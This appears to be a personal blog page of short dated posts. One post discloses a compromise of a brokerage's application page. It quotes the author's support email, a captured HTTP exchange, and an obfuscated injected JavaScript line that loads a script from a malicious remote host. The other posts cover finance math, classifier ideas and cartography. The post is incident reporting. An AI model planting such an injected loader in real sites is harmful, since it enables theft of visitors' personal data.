02.10.10
Posted in Blogroll, Ideas at 1:14 pm by Michael
The brain actually works in tandem with the body to ward away diseases, with such protections ranging from a sense of smell to sympathetic nausea. Chief among these is the “eww factor”. “Gross” objects, behaviors, and sensations are ones which signal conditions for potential disease transmission.
Certain chronic disorders such as cyclic vomiting syndrome can result when these systems are engaged to an abnormal extent.
Permalink
02.04.10
Posted in Programming at 11:42 pm by Michael
When signing up with Just2Trade, an online brokerage, I observed that their site (which asks for a HUGE amount of personal data) was hacked and appeared to be pulling in a remote javascript from the application page (yes, the application page which asks you to enter in enough data for someone to steal your identity twice over). I contacted customer support with the following email, but it has been nearly one full business week and yet the issue persists! I would be EXTREMELY wary about trading with them, or giving them any sort of personal data, based on this.
If this isn’t resolved in some way or another by next week I’ll post it to Digg, but for now I’ll give them a bit more time to get their act together:
“Dear Just2Trade Support,
This is bad. I don’t know how else to say it. Properly remedying this issue is going to take a lot of cleanup, both technical and business-wise. Here goes:
While completing your application, which asks for quite a bit of personal information (more than enough for someone to steal my identity with), I opened Firebug and noticed a suspicious HTTP request to the following URL:
http://google-com-sg.pcauto.com.cn.google-at.truesoulonline.ru:8080/miniclip.com/miniclip.com/ganji.com/google.com/cnn.com/
Investigating this more, I opened up Wireshark and captured the HTTP stream:
GET /miniclip.com/miniclip.com/ganji.com/google.com/cnn.com/ HTTP/1.1
Host: google-com-sg.pcauto.com.cn.google-at.truesoulonline.ru:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 31 Jan 2010 04:32:41 GMT
Content-Type: text/javascript
Connection: close
X-Powered-By: PHP/5.1.6
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 15
/* nothing */
Going back to Firebug and trying to pinpoint the source of this request, it appears that every single one of the local Javascript files on the application pages has been compromised, since they all have this string at the end:
/*Exception*/ document.write(‘<script src=’+'h(!t!)t#@p(&:(&$/!/@^g@)&(^o!@o^#g)@l^e#-&)c!#o$m&$(-@s@^#g@!!.&@p$c@#^a$@u!)(!!t$@&)#o&&.@$$!c#^)$o$^m^@&)(.&!@c@)@(n@^#.#^g!^o@&#@#o#)g$l@@&e&^-^)a!!!#t#&.&t@#r$&!)u!(e$(((s$)^#o$)u$)#l!#&o&)n(l^$i&n#$@!e())@.@#)^r&u!:&^8#0$(#^!8$$#0@&@(/#^m)$)i^n!$i&^@c^!l^i#)p##.))$c^$o$m)$/(^!m$i((n^^$i)@c()#!l$)$!i(^p^)&.^(c@$$@o&^m(/$@g!#$a!#@n&)^#j^^$i&(.!c!^^&o(&)m#&(@/(!g(&o(#$o^$@g&)((@l^e#&.!$$c^@$o$m!!)^/$!c&n#^@n^^.))c(o($&m&#!&/$#’.replace(/&|\$|\)|\!|#|\(|@|\^/ig, ”)+’ defer=defer></scr’+'ipt>’);
(Which is writing out the reference to the script I mentioned above).
Now here’s the really disturbing thing: if you just go to the script (say sifr.js) directly in a browser, that code will not appear. The HTTP headers from an application page must be intact (and since they have personal data, I’m not posting mine; fill out the application yourself and test it). I thought this may have been some piece of malware on my own system at first, so I re-created those headers in wget just to be sure; they still appeared.
This is *very* bad for two reasons:
First, it means your server has been compromised. Just writing out some static Javascript could indicate a simple cross-site scripting scenario. But writing it out conditionally on a specific http header appearing is something that can only be done with access to server-side code.
Second, contained within the HTTP headers sent to your script are all of the fields submitted with the form. Yes, this includes driver’s license #, bank account information, SSN, address, phone number, work address, title, email… far more than would be necessary to steal someone’s identity. The ability to read the headers and conditionally take some action indicates that whoever hacked the site can read all of the data submitted to it.”
The problem is not so much that the script is doing anything – right now it’s doing /* nothing */, though this could be changed on the remote end – but that it is only being output in response to the proper HTTP headers. And on the application page (the only page, in fact, where the headers are “proper”), these headers include a great deal of personal information. A server-side script which can include a string contingent upon these headers being there can also capture them directly.
Permalink
01.26.10
Posted in Ideas, Mathematics at 12:28 am by Michael
This may give you a good idea of just how much you can expect out of that 401(k) contribution:
If you invest a recurring principal p on a yearly basis into an account with an (r-1)*100% APY (e.g. r=1.05 for a 5% APY), your return after y years is: p * (r^(y+1) – r) / (r – 1).
(For y >= 1, since we’re starting at the first compounding).
So if you put $5k a year into a 401(k) with 3% interest, you’ll have $59038 by the end of the 10th year, vs. the $50000 you’d have without interest.
After 20 years, you’d have $138,382, vs $100,000.
If you contributed $10,000 per year for 20 years, you’d end up with $276,764, vs. $200,000.
Worth it? You decide. But that shocking “you’ll have a $500k nest egg after 30 years” claim, while true, is only true because it’s counting the principal you’re investing.
Granted, locking it away does remove the temptation to spend it.
Permalink
01.12.10
Posted in Personal at 10:42 pm by Michael
Today marks the first time someone has applied for a job at an organization I have started.
Permalink
01.09.10
Posted in Biology, Ideas, Research at 4:55 pm by Michael
Idea: a data classification metamodel based on the immune system: train a small bag of classifiers and clone the ones that perform well, but with a small chance of random mutations to the hyperparameters. Weight classifiers created in this manner exponentially based on iterations since last correct classification. Keep a “memory threshold” below which the weight will not fall in case that pattern is encountered again.
Permalink
12.29.09
Posted in General at 12:10 am by Michael
Edge cities tend to spring up radially around larger population centers, leading to population distributions that tend to be proportional to the population in the host city and inversely proportional to the distance from it.
Permalink
12.27.09
Posted in Ideas, Research at 10:00 pm by Michael
Decisions using the kNN framework are arrived at through a majority vote of an observation’s k nearest neighbors (given some distance metric). When aggregating many kNN decisions and weighing them against one much more important kNN decision, one strategy I’ve found to work well is to copy congress:
The critical neighbor is “the President” and can’t “pass” the vote, but can “veto” it.
A decision is made to “pass” either on the vote of a majority of the neighbors in the absence of a veto, or given a 2/3 majority in its presence.
One example of this is aggregating decisions over a market index. Each individual asset in the index has an impact in its overall movement, but the index itself (the President) can also be analyzed directly.
Permalink
12.26.09
Posted in Philosophy at 8:35 pm by Michael
The root of this phenomenon is cultural, but in no small part it is perpetuated by the sheer number of hours that a job consumes. It crowds everything else out and both dichotomizes and quantizes the schedule: “weekday” vs. “weekend”, “work time” vs. “personal time”.
There’s little time to do anything beyond the job at that point. Choose carefully.
Permalink
11.22.09
Posted in General, Ideas at 5:11 pm by Michael
The fundamental dilemma of cartography is attempting to project a 3-dimensional structure (the Earth) onto a 2-dimensional map. This is mathematically impossible to accomplish losslessly, so distortions are invariably introduced. Several standard projections exist, each with its own advantages and disadvantages, but one thing I’ve never seen was a context-aware projection: one which maximizes distortion in the least significant parts of the map (based directly upon the data being mapped) in exchange for minimizing distortion in significant areas. Something like PCA.
Permalink
11.11.09
Posted in Ideas, Research at 1:19 am by Michael
Many spam mails that land in my inbox tend to be thematically similar, though the messages have slight variations (perhaps they’re being sent by the same spammer). Ordinary messages do not cluster so well. Clusters formed on these spam messages should thus be “tighter” than clusters to which ordinary messages belong. Cluster membership and validity may thus be used as a feature in subsequent spam classification.
Permalink
« Previous entries Next Page » Next Page »